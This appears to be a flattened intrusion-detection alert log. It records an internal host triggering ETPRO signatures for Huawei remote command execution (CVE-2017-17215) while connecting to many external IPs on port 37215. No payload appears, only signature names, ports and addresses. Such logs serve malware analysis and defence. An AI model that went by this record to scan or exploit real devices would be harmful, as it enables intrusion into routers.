                                            06/14/24-10:44:06.473507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4640037215192.168.2.14156.179.98.115
                                            06/14/24-10:43:56.242349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824437215192.168.2.1441.180.178.147
                                            06/14/24-10:44:29.025550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242837215192.168.2.14156.30.46.85
                                            06/14/24-10:44:08.503100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5687837215192.168.2.14156.30.76.223
                                            06/14/24-10:43:41.902390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961837215192.168.2.1441.157.119.217
                                            06/14/24-10:44:20.805119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181237215192.168.2.1441.13.100.164
                                            06/14/24-10:44:16.716729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4649437215192.168.2.14197.72.146.16
                                            06/14/24-10:44:08.503754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829437215192.168.2.1441.117.164.62
                                            06/14/24-10:44:00.341831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426037215192.168.2.14197.90.224.197
                                            06/14/24-10:43:50.111161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083037215192.168.2.14156.221.18.151
                                            06/14/24-10:44:33.134118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3418437215192.168.2.1441.211.6.179
                                            06/14/24-10:44:31.054184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3833637215192.168.2.14197.64.30.69
                                            06/14/24-10:43:45.987635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199437215192.168.2.14156.122.50.136
                                            06/14/24-10:44:22.861287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5606837215192.168.2.1441.167.12.141
                                            06/14/24-10:43:39.808082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439437215192.168.2.14197.103.242.245
                                            06/14/24-10:44:14.668299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3279437215192.168.2.1441.71.244.138
                                            06/14/24-10:44:20.827596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749837215192.168.2.14156.61.171.192
                                            06/14/24-10:43:45.969028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076437215192.168.2.14156.158.186.227
                                            06/14/24-10:44:20.807126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205637215192.168.2.14156.41.134.120
                                            06/14/24-10:44:18.764067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502237215192.168.2.14156.42.213.5
                                            06/14/24-10:43:34.677487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655637215192.168.2.14156.23.36.202
                                            06/14/24-10:44:22.858423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059637215192.168.2.1441.86.208.249
                                            06/14/24-10:44:22.861534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5402237215192.168.2.14197.160.204.246
                                            06/14/24-10:43:48.045531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373837215192.168.2.1441.139.46.68
                                            06/14/24-10:44:18.780042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046037215192.168.2.14156.66.76.105
                                            06/14/24-10:43:45.968335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747437215192.168.2.1441.252.89.231
                                            06/14/24-10:43:45.969593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5320437215192.168.2.14156.155.131.20
                                            06/14/24-10:44:22.860400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939437215192.168.2.1441.167.64.181
                                            06/14/24-10:44:29.014872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3509837215192.168.2.14197.136.162.178
                                            06/14/24-10:44:35.177576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654837215192.168.2.14197.238.208.40
                                            06/14/24-10:44:02.382843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847837215192.168.2.1441.112.60.36
                                            06/14/24-10:44:08.504013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281237215192.168.2.1441.17.173.4
                                            06/14/24-10:43:48.029141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974237215192.168.2.1441.127.39.212
                                            06/14/24-10:44:06.448602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864237215192.168.2.1441.4.74.254
                                            06/14/24-10:44:35.177752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501837215192.168.2.14156.144.94.132
                                            06/14/24-10:43:58.275596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409837215192.168.2.14156.78.100.50
                                            06/14/24-10:44:33.133466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919237215192.168.2.14156.110.172.52
                                            06/14/24-10:43:43.940585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039837215192.168.2.14156.98.108.128
                                            06/14/24-10:43:45.968115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5938637215192.168.2.14156.160.68.141
                                            06/14/24-10:43:50.111133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904837215192.168.2.14197.26.222.188
                                            06/14/24-10:43:58.289613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451437215192.168.2.14156.166.115.99
                                            06/14/24-10:44:20.804823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4691437215192.168.2.14197.88.165.17
                                            06/14/24-10:43:52.163454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3813637215192.168.2.14156.227.25.183
                                            06/14/24-10:44:31.091098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599837215192.168.2.14156.175.47.199
                                            06/14/24-10:43:36.724249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212837215192.168.2.1441.78.28.179
                                            06/14/24-10:43:58.276373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045837215192.168.2.1441.205.146.138
                                            06/14/24-10:43:56.243940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947037215192.168.2.1441.139.239.235
                                            06/14/24-10:44:10.565757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.1441.116.127.181
                                            06/14/24-10:44:22.883187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817237215192.168.2.1441.123.153.225
                                            06/14/24-10:44:12.616781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541437215192.168.2.14156.234.240.2
                                            06/14/24-10:44:26.980798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732837215192.168.2.14197.164.235.72
                                            06/14/24-10:43:37.763500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003837215192.168.2.14197.49.11.146
                                            06/14/24-10:44:08.519824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604037215192.168.2.14156.152.137.8
                                            06/14/24-10:44:26.998672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155637215192.168.2.14156.16.175.170
                                            06/14/24-10:44:14.681680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278637215192.168.2.1441.174.236.36
                                            06/14/24-10:43:56.230012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519637215192.168.2.1441.91.107.140
                                            06/14/24-10:43:41.906359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001637215192.168.2.14197.34.148.6
                                            06/14/24-10:44:31.084207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981437215192.168.2.14156.131.92.6
                                            06/14/24-10:44:33.150784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400037215192.168.2.14156.163.23.45
                                            06/14/24-10:44:31.091143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388637215192.168.2.14197.220.89.208
                                            06/14/24-10:43:50.110731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3902037215192.168.2.14197.197.253.81
                                            06/14/24-10:43:52.150126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302437215192.168.2.14197.174.140.218
                                            06/14/24-10:44:29.021800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5781437215192.168.2.14156.126.34.204
                                            06/14/24-10:43:58.295613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4069037215192.168.2.14197.15.111.215
                                            06/14/24-10:44:12.615881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697437215192.168.2.14156.85.252.101
                                            06/14/24-10:44:16.734782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577237215192.168.2.14156.144.247.254
                                            06/14/24-10:43:45.968899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054637215192.168.2.14156.76.247.65
                                            06/14/24-10:43:58.277909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442237215192.168.2.14197.26.89.118
                                            06/14/24-10:43:56.245248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300037215192.168.2.14156.172.83.41
                                            06/14/24-10:44:20.827840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4995037215192.168.2.14156.11.71.189
                                            06/14/24-10:44:06.452583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239837215192.168.2.1441.26.144.166
                                            06/14/24-10:44:14.672619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174237215192.168.2.14197.166.90.115
                                            06/14/24-10:43:43.969482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5423837215192.168.2.14156.4.161.169
                                            06/14/24-10:43:37.759161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836237215192.168.2.14156.13.194.173
                                            06/14/24-10:43:52.150938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262637215192.168.2.14156.199.110.232
                                            06/14/24-10:44:04.411272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933437215192.168.2.14156.255.23.6
                                            06/14/24-10:44:04.411492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734837215192.168.2.14197.223.216.28
                                            06/14/24-10:44:18.762746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577237215192.168.2.1441.139.93.154
                                            06/14/24-10:44:24.913514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5637637215192.168.2.1441.237.14.148
                                            06/14/24-10:44:10.564043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396837215192.168.2.1441.41.26.144
                                            06/14/24-10:44:04.412128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721437215192.168.2.14197.25.71.96
                                            06/14/24-10:44:06.452220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833837215192.168.2.1441.53.29.95
                                            06/14/24-10:44:02.381603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754837215192.168.2.14156.105.127.196
                                            06/14/24-10:44:20.805155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622637215192.168.2.14197.229.228.116
                                            06/14/24-10:44:22.860452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506437215192.168.2.1441.120.148.119
                                            06/14/24-10:44:27.001447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207237215192.168.2.14197.160.198.72
                                            06/14/24-10:44:29.013636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070037215192.168.2.14197.132.224.118
                                            06/14/24-10:44:04.422923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4523237215192.168.2.14156.32.100.161
                                            06/14/24-10:44:06.452707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822037215192.168.2.1441.252.206.213
                                            06/14/24-10:44:26.979466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991237215192.168.2.14156.132.183.4
                                            06/14/24-10:44:33.149515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675837215192.168.2.14156.154.88.89
                                            06/14/24-10:44:29.013178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346237215192.168.2.14197.174.39.67
                                            06/14/24-10:43:48.045708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374637215192.168.2.14197.204.9.102
                                            06/14/24-10:44:31.092400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3610837215192.168.2.14197.22.197.8
                                            06/14/24-10:44:10.548891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590237215192.168.2.14197.244.128.84
                                            06/14/24-10:43:56.245712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714637215192.168.2.14197.86.180.183
                                            06/14/24-10:44:35.177137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018437215192.168.2.1441.89.180.56
                                            06/14/24-10:43:36.723275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427637215192.168.2.1441.96.204.199
                                            06/14/24-10:43:39.791352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304037215192.168.2.14197.18.189.212
                                            06/14/24-10:44:16.716969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234437215192.168.2.14156.243.132.207
                                            06/14/24-10:44:29.027739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463437215192.168.2.14156.225.173.123
                                            06/14/24-10:43:39.808154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810037215192.168.2.1441.199.27.212
                                            06/14/24-10:44:16.716792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889637215192.168.2.1441.184.131.168
                                            06/14/24-10:43:54.202777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911637215192.168.2.14197.220.28.240
                                            06/14/24-10:44:00.323668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045437215192.168.2.14197.165.43.36
                                            06/14/24-10:43:52.146319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014037215192.168.2.14156.67.121.23
                                            06/14/24-10:44:08.503299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655837215192.168.2.1441.185.70.107
                                            06/14/24-10:44:04.410710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376637215192.168.2.1441.146.154.229
                                            06/14/24-10:43:45.984145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544637215192.168.2.14156.193.191.84
                                            06/14/24-10:44:08.518577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749037215192.168.2.1441.103.148.80
                                            06/14/24-10:44:08.504038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183637215192.168.2.14197.110.15.255
                                            06/14/24-10:44:22.857718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790837215192.168.2.1441.145.44.122
                                            06/14/24-10:43:41.899228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862237215192.168.2.1441.99.67.201
                                            06/14/24-10:43:48.029872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011037215192.168.2.14197.196.252.238
                                            06/14/24-10:43:50.115618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883037215192.168.2.1441.252.57.94
                                            06/14/24-10:44:33.148456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5145437215192.168.2.14156.205.176.128
                                            06/14/24-10:43:50.073458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066237215192.168.2.14197.193.146.137
                                            06/14/24-10:44:16.732578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244037215192.168.2.14197.93.102.28
                                            06/14/24-10:44:22.861092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450637215192.168.2.14197.30.211.231
                                            06/14/24-10:43:58.274973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582437215192.168.2.14197.50.219.165
                                            06/14/24-10:44:00.343524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542837215192.168.2.14197.204.211.235
                                            06/14/24-10:44:29.012982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3564437215192.168.2.14197.219.150.247
                                            06/14/24-10:43:36.724299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283237215192.168.2.14197.184.220.213
                                            06/14/24-10:44:29.021975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954837215192.168.2.14197.182.130.241
                                            06/14/24-10:44:16.715267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081637215192.168.2.14197.218.184.120
                                            06/14/24-10:43:41.904964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5169037215192.168.2.14156.37.147.100
                                            06/14/24-10:44:12.616416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870237215192.168.2.14156.239.224.164
                                            06/14/24-10:44:06.451391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311237215192.168.2.14156.171.250.8
                                            06/14/24-10:43:36.705666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919837215192.168.2.14156.128.113.32
                                            06/14/24-10:43:37.763577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688637215192.168.2.14197.50.81.48
                                            06/14/24-10:43:39.790376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852437215192.168.2.1441.232.46.38
                                            06/14/24-10:43:41.897996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746037215192.168.2.1441.106.48.193
                                            06/14/24-10:43:48.017308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5491237215192.168.2.1441.90.131.63
                                            06/14/24-10:43:45.969373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341637215192.168.2.14156.82.240.42
                                            06/14/24-10:43:45.984917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746237215192.168.2.14156.215.212.224
                                            06/14/24-10:44:26.980655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340437215192.168.2.1441.61.148.105
                                            06/14/24-10:44:00.343479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207837215192.168.2.14156.91.146.209
                                            06/14/24-10:44:24.916802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092637215192.168.2.14197.219.123.131
                                            06/14/24-10:43:50.072594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620837215192.168.2.1441.8.50.43
                                            06/14/24-10:43:36.701326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355037215192.168.2.14197.50.229.224
                                            06/14/24-10:43:58.292905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348637215192.168.2.1441.94.215.74
                                            06/14/24-10:44:26.998732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568637215192.168.2.14156.113.34.139
                                            06/14/24-10:44:22.859900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967037215192.168.2.14197.82.13.150
                                            06/14/24-10:44:14.682910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5632637215192.168.2.1441.78.48.197
                                            06/14/24-10:44:04.404652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761637215192.168.2.14156.6.186.56
                                            06/14/24-10:44:22.859381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664837215192.168.2.14197.184.88.189
                                            06/14/24-10:44:12.647141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524837215192.168.2.14197.148.30.69
                                            06/14/24-10:44:02.384364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642837215192.168.2.1441.123.11.17
                                            06/14/24-10:44:06.453562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852437215192.168.2.14156.129.26.199
                                            06/14/24-10:44:26.980528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691837215192.168.2.14156.54.215.236
                                            06/14/24-10:44:10.544007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142037215192.168.2.14197.118.206.101
                                            06/14/24-10:44:33.133396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567037215192.168.2.1441.119.89.206
                                            06/14/24-10:44:29.023803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020037215192.168.2.1441.196.138.48
                                            06/14/24-10:44:20.806991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912037215192.168.2.1441.244.221.165
                                            06/14/24-10:43:39.791244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990637215192.168.2.14197.229.113.238
                                            06/14/24-10:43:48.019739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132837215192.168.2.14156.158.253.213
                                            06/14/24-10:44:33.152219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627637215192.168.2.14197.2.32.99
                                            06/14/24-10:44:22.860328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844437215192.168.2.14197.25.116.238
                                            06/14/24-10:44:16.733039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745237215192.168.2.14197.117.163.43
                                            06/14/24-10:44:02.383253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5243237215192.168.2.14197.138.146.33
                                            06/14/24-10:44:08.517427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994037215192.168.2.14156.124.147.197
                                            06/14/24-10:44:33.132755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4923437215192.168.2.1441.68.123.216
                                            06/14/24-10:44:04.421576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136837215192.168.2.14197.225.222.231
                                            06/14/24-10:44:24.917706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953437215192.168.2.1441.90.101.19
                                            06/14/24-10:43:37.762466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538037215192.168.2.14156.147.51.227
                                            06/14/24-10:43:45.966821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360237215192.168.2.14156.5.194.24
                                            06/14/24-10:44:24.944178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745437215192.168.2.14156.69.180.178
                                            06/14/24-10:44:22.859336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963037215192.168.2.14197.191.30.1
                                            06/14/24-10:43:54.184709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3732837215192.168.2.14197.230.193.231
                                            06/14/24-10:43:43.940345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437637215192.168.2.14156.213.3.247
                                            06/14/24-10:44:08.501235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624037215192.168.2.14156.2.219.185
                                            06/14/24-10:44:24.934197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565837215192.168.2.1441.233.96.229
                                            06/14/24-10:44:33.151382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330637215192.168.2.14197.226.51.167
                                            06/14/24-10:44:29.012810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969837215192.168.2.14156.110.109.169
                                            06/14/24-10:43:43.942063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971237215192.168.2.1441.185.136.98
                                            06/14/24-10:43:54.198697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882237215192.168.2.14197.205.131.148
                                            06/14/24-10:44:08.505319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315637215192.168.2.14197.90.107.77
                                            06/14/24-10:43:48.031791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518037215192.168.2.14156.28.114.41
                                            06/14/24-10:44:14.667466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302437215192.168.2.14156.165.64.208
                                            06/14/24-10:44:08.518667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845237215192.168.2.1441.233.89.126
                                            06/14/24-10:43:37.760173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572837215192.168.2.14156.20.201.23
                                            06/14/24-10:44:35.183160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538837215192.168.2.14197.78.184.28
                                            06/14/24-10:44:08.503790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716637215192.168.2.1441.34.47.246
                                            06/14/24-10:43:45.989797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479437215192.168.2.1441.234.153.82
                                            06/14/24-10:44:35.181429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064437215192.168.2.14156.161.83.71
                                            06/14/24-10:44:31.057690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322437215192.168.2.14156.5.192.111
                                            06/14/24-10:44:12.614218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739637215192.168.2.14156.195.80.230
